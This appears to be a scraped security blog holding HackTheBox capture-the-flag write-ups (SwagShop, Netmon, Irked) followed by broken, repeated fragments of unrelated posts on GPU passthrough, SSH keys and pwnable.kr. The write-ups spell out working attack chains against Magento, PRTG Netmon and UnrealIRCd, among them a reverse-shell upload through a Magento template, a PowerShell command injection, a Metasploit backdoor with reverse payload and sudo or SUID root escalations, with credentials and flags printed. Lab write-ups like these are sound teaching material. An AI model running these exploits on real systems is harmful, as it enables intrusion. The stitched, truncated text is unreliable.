Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.140/js/lib/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ---- Entering directory: http://10.10.10.140/js/tiny_mce/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w' if you want to scan it anyway) ----------------- END_TIME: Sat Sep 7 15:29:47 2019 DOWNLOADED: 9224 - FOUND: 3 </code></pre> Found in /var/package/Interface_Adminhtml_Default-1.9.0.0.xml that the Magento version is 1.9 which is vulnerable to SQL injection. Found exploit code at Magento eCommerce - Remote Code Execution - XML webapps Exploit</a>. Code worked with some modifications, dropping us with admin credentials: user: groot pass: yeet</code></pre> Within the admin app for Magento, I was able to use the following attack named Froghopper: Anatomy Of A Magento Attack: Froghopper</a> To execute the attack, I needed to upload a php file that would give me a shell, but to upload it, I had to make the file extension .jpg. Then upload it as a new category image. php-reverse-shell | pentestmonkey</a> Then using the "Newsletter" feature of magento, I used the following code, and then previewed it to execute the php script {{block type='core/template' template='../../../../../../media/catalog/category/<filename>.jpg}}</code></pre>Got User</h3> I got a shell from this and was able to read the user hash as user www-data. cat /home/haris/user.txt a448877277e82f05e5ddf9f90aefbac8</code></pre> Now to see how I can do privilege escalation: sudo -l Matching Defaults entries for www-data on swagshop: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on swagshop: (root) NOPASSWD: /usr/bin/vi /var/www/html/* sudo /usr/bin/vi /var/www/html/*</code></pre> Since I need to run vi in a tty and my reverse shell did not run, I had to get a proper tty via the following command: /usr/bin/python3 -c "import pty;pty.spawn('/bin/sh');" </code></pre> Now I can run vi as sudo: sudo /usr/bin/vi /var/www/html/**</code></pre> This opens vi, and then entering the following in the vi command line gives me a root shell: :sh</code></pre>Got Root</h3> And I am in fact root: whoami root</code></pre> And now we can read the root hash: cat /root/root.txt c2b087d66e14a652a3b86a130ac56721 ___ ___ /| |/|\| |\ /_| ´ |.` |_\ We are open! (Almost) | |. | | |. | Join the beta HTB Swag Store! |___|.__| https://hackthebox.store/password PS: Use root flag as password!</code></pre> HTB Netmon Quick Writeup 2019-03-08T13:09:31-04:00 Netmon</h1> Enumeration</h3> nmap -A -p- -T4: </blockquote> Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-08 20:55 EST Nmap scan report for 10.10.10.152 Host is up (0.100s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-02-19 11:18PM 1024 .rnd | 02-25-19 09:15PM <DIR> inetpub | 07-16-16 08:18AM <DIR> PerfLogs | 02-25-19 09:56PM <DIR> Program Files | 02-02-19 11:28PM <DIR> Program Files (x86) | 02-03-19 07:08AM <DIR> Users |_02-25-19 10:49PM <DIR> Windows | ftp-syst: |_ SYST: Windows_NT 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds Network Distance: 2 hops Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: -2s, deviation: 0s, median: -2s | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2019-03-08 20:56:22 |_ start_date: 2019-03-08 20:11:33 TRACEROUTE (using port 5900/tcp) HOP RTT ADDRESS 1 100.19 ms 10.10.12.1 2 100.41 ms 10.10.10.152</code></pre>Got User</h2> Just log in to anonymous FTP and find the user.txt file. </blockquote> Got Admin Credentials For Web App</h2> Find plaintext credentials in 'C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.old.bak' </blockquote> username = prtgadmin </blockquote> password = PrTg@dmin2019 </blockquote> Got Admin Hash</h2> Exploit a vulnerability in the PRGT Netmon's powershell sensor, more specifically the default powershell script. This allows for execution of a powershell script as administrator. Use the powerline command to copy the root.txt file to a hidden folder that is open to the FTP, and grab the file using FTP. Test.txt;Copy-Item -Path C:\Users\Administrator\root.txt -Destination C:\ProgramData\1.txt -Force </code></pre> HackTheBox Irked Quick Writeup 2019-03-08T13:04:23-04:00 HackThe Box Irked Quick Guide</h1> MACHINE IP: 10.10.10.117 </blockquote> Enumeration</h3> --> nmap -A -sV -p 0-66566 </blockquote> 22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) |_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (ED25519) 80/tcp open http Apache httpd 2.4.10 ((Debian)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.4.10 (Debian) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 53292/udp status |_ 100024 1 57391/tcp status 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 57391/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd </code></pre>Get Unpriviliged Shell</h3> msfconsole use exploit/unix/irc/unreal_irc_3201_backdoor </blockquote> set RHOSTS 10.10.10.117 </blockquote> set RPORT 65534 </blockquote> set payload cmd/unix/reverse </blockquote> Research</h3> /home/djmardov/Documents/user.txt is the location of the user text file </blockquote> uname -a </blockquote> Linux irked 3.16.0-6-686-pae #1 SMP Debian 3.16.56-1+deb8u1 (2018-05-08) i686 GNU/Linux</code></pre> cat .backup - contents </blockquote> Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss</code></pre>Get User Password</h3> Retrieve irked.jpg from the webpage </blockquote> steghide --extract -sf irked.jpg </blockquote> password: UPupDOWNdownLRlrBAbaSSss Kab6h+m+bbp2J:HG</code></pre>Owned User</h2> Credentials</h3> user = djmardov </blockquote> pass = Kab6h+m+bbp2J:HG </blockquote> Found /usr/bin/viewuser with root execute privileges, looks for file /tmp/listusers. </blockquote> Got Root</h2> Got root shell after calling /bin/bash in /tmp/listusers </blockquote> Method to obtain root: </blockquote> --> touch /tmp/listusers --> echo "/bin/bash" > /tmp/listusers --> chmod 7777 /tmp/listusers --> viewuser --> rm /tmp/listusers</code></pre>Command to Instantly Get Root</h3> touch /tmp/listusers && echo "su root" > /tmp/listusers && chmod +x /tmp/listusers && viewuser </blockquote>

Hacking Cheap IoT Cameras for Fun and No Profit

Flag

GPU Passthrough on Optimus Laptop in Proxmox

Getting Started</h2>

Obtaining the vBIOS</h3> So the first thing you will need when starting is a copy of the vBIOS of your GPU. For me, most of the ways to do this online did not work. I would get a vague Input/Output Error</code> when trying to perform it in Linux.</p>

Extracting from the Registry Key Method 2</h4> If for some reason that doesn't work or you want to do it on Windows, the steps are pretty much as follows:</p> Open the .reg file in Notepad++</li>

Proxmox Configuration</h2> Okay, now we have the first file we need, which is also the most important.</p>

Drivers</h4> Ideally you have not installed the nvidia drivers. If you have, I highly recommend uninstalling them now before going any futher:</p>

Copying over the vBIOS</h4> The last thing to do is to copy over the vBIOS.</p> Put it in this directory: /usr/share/kvm/</code> and name it what you want. I named mine vbios_1060.bin</code></p> At this point, you should be good to go to create your VMs and get going.</p>

pwnable.kr walkthrough 03: bof

bof</h1> For this challenge, we are presented with a bit different prompt than before.</p> We now just simply get source code and a binary, as well as a netcat connection to connect to to exploit it remotely.</p>

Source Code Analysis</h2> Looking at bof.c</code> we see this:</p>

pwnable.kr walkthrough 02: collision

Collision</h1> When we login we are prsented with:</p>

Looking at it in GDB</h2> Using gdb we can run through this in a more friendly environment</p>

pwnable.kr walkthrough 01: fd

NixOS: A Flaky Experience

Tornado Writeup

Hardware SSH Keys on macOS

The Problem</h2> Let me first frame the problem so you understand why I am writing this post.</p>

Common Sense Writeup

a.out</h2> Looking at the file a.out, it appeared to be an ELF binary, and running it simply resulted in a segmentation fault. Opening it up in Ghidra revealed that it was in fact an ELF binary with debugging symbols stripped in order to increase the difficulty to reverse it.</p>

Reversing main</h3>

Hardware SSH Keys on Windows and WSL

Overview</h2> Essentially what this setup requires is a native Windows build of OpenSSH that includes support for the ed25519-sk and ecdsa-sk SSH key types. Once this is installed, we can simply forward the connection to the Windows SSH Agent service to our Linux host on WSL.</p>

Step 1: Install Native OpenSSH on Windows</h2> It's entirely possible you already have a compatible OpenSSH client. Just open PowerShell and run the following:</p>

Remove Old OpenSSH Client</h3> If you installed the OpenSSH client package on Windows, you should go ahead and remove that now before you proceed. To do that quickly, run the following command:</p>

Start and Enable SSH Agent</h3> Next, you need to make sure the SSH Agent service is running and enabled. It should be by default, but if its not you can run the following:</p>

Step 3: Setting up WSL Integration</h2> If you're like me, you probably use WSL for pretty much everything development related on your Windows PC. Fortunately, getting your shiny new hardware based SSH key working in WSL is pretty easy thanks to some open source projects.</p>

Bonus: Setting up Git Signing with SSH Key</h3> I also like to sign my Git commits with my SSH key, and you can totally do this with your hardware SSH key. Simply take the public key and add the following to your gitconfig:</p>

Energy Monitoring with a Tasmota Smart plug

HackTheBox Writer Writeup

Enumeration</h2> The first thing to do is to add the following entry to /etc/hosts</code></p>

Nmap</h3> From there, an nmap scan should show us all the open and listening TCP ports on the machine:</p>

smbclient</h3> Using smbclient to list the shares we get the following:</p>

HTTP</h3> Since it has HTTP running, lets just navigate to the site real quick:</p> </p>

Retrieving Files</h3>

Initial Foothold</h2>

Privilege Escalation</h2>

When Sqlmaps Attack!

Watermarked

[REDACTED]

Proxmox Configuration</h2>
Okay, now we have the first file we need, which is also the most important.</p>

Copying over the vBIOS</h4>
The last thing to do is to copy over the vBIOS.</p>
Put it in this directory: `/usr/share/kvm/</code> and name it what you want. I named mine vbios_1060.bin</code></p>`
`At this point, you should be good to go to create your VMs and get going.</p>`

bof</h1>
For this challenge, we are presented with a bit different prompt than before.</p>
We now just simply get source code and a binary, as well as a netcat connection to connect to to exploit it remotely.</p>

The Problem</h2>
Let me first frame the problem so you understand why I am writing this post.</p>

a.out</h2>
Looking at the file a.out, it appeared to be an ELF binary, and running it simply resulted in a segmentation fault. Opening it up in Ghidra revealed that it was in fact an ELF binary with debugging symbols stripped in order to increase the difficulty to reverse it.</p>

Overview</h2>
Essentially what this setup requires is a native Windows build of OpenSSH that includes support for the ed25519-sk and ecdsa-sk SSH key types. Once this is installed, we can simply forward the connection to the Windows SSH Agent service to our Linux host on WSL.</p>

Step 3: Setting up WSL Integration</h2>
If you're like me, you probably use WSL for pretty much everything development related on your Windows PC. Fortunately, getting your shiny new hardware based SSH key working in WSL is pretty easy thanks to some open source projects.</p>

HTTP</h3>
Since it has HTTP running, lets just navigate to the site real quick:</p>
</p>